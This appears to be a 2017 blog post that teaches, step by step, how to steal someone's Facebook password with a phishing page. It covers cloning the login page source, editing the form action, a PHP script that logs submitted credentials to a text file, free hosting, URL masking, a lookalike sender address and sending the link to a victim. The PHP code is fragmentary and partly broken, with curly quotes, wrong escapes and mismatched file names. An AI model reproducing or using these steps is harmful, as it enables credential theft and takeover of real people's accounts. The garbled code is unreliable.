Friday, January 27, 2017

how to hack someone's facebook account

Everyone like to hack facebook account of others,

Facebook is the number one social media today in the world. but,Facebook is one of the secure application on the internet

There's so many ways and possibilities to hack facebook password account,

from the easy and simple one until the hard and very complicated.

The basic hack facebook password account method actually almost the same,

but with different type, kind, and ways. Here's some ways how to hack facebook password account :

here is the simple method to hack a fecebook account using phishing
webpage ,is the best and easiest way to hack someone's facebook account

The page can be sent via email to your victim and will look exactly like Facebook login page
if the victim logs in , the information will be sent to you instead of to facebook

 in this tutorial i will show you how you can  creat undetectable Facebook phishing website

every thing step by step just follow all this steps

so,you can creat a webpage which look like any website , like facebook

by creating phishing webpage you  can make users to believe  that it is

original facebook and enter their ID and Password.

ok lets creat a phishing webpage

1. we have to going to

press CTRL+U or Right click and Select "View Page source",

press CTRL+A to select click CTRL+c to copy the code to Notepad

now press  CTRL+f and type  "action="in Notepad

you will find a code like this


you have to change it to "action=next.php"

now have to change the method post to get because it will not working
with the post action

no problems ok , Save All that as index.html

now we have to creat the password.php to store the password

open your notepad and copy the following code
header(“Location: “);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “/r/n”);
fwrite($handle, “/r/n”);

and save it as password.php

now open your notepad and save it as <passwords.txt >

we have now  three files (passwords.txt ,password.php , index,html)

now it's time for upload them on hosting

in any sub domain Web we prefer to use free hosting because it not important to use premium hosting for this small work

use one these sites , or

use this sites through the secure connection sites that you can hide your ip adress like

i recommend to use it is free

go to :

 fill all detais  and and click on Creat My Account

open your email and verify the account you will aee the active domain in your account

Now open the first file manager icon under "File managers" section

Open up "public_html" folder and select those tree file then click on upload

not !! Access your URL with this id at end for exemple(/?id=facebook),it is important for bypassing security chek

for exemple

if you want  to hide this URL go to to hide url

now we have the phishing

now creat an mail account with facebook keyword like,,,

 send this masked phisher link to your victim

when victim  login to our phishing webpage his data will get stores in database. "passwords.txt
to see that click the view button next to passwords.txt file

inside you can see the victim's email and password